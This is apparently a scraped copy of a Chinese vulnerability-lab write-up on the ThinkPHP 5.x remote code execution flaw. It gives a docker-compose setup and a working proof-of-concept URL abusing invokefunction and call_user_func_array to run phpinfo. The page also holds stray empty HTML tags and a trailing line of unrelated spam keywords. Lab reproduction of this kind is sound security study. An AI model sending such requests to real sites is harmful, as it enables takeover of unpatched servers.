<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ThinkPHP5 5.0.22/5.1.29 遠程代碼執行漏洞

    Path thinkphp/5-rce

    ThinkPHP是一款運用極廣的PHP開發框架。其版本5中,由于沒有正確處理控制器名,導致在網站沒有開啟強制路由的情況下(即默認情況下)可以執行任意方法,從而導致遠程命令執行漏洞。

    參考鏈接:

    漏洞環境

    運行ThinkPHP 5.0.20版本:

    docker-compose up -d
    

    環境啟動后,訪問http://your-ip:8080即可看到ThinkPHP默認啟動頁面。

    漏洞復現

    直接訪問http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可執行phpinfo:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类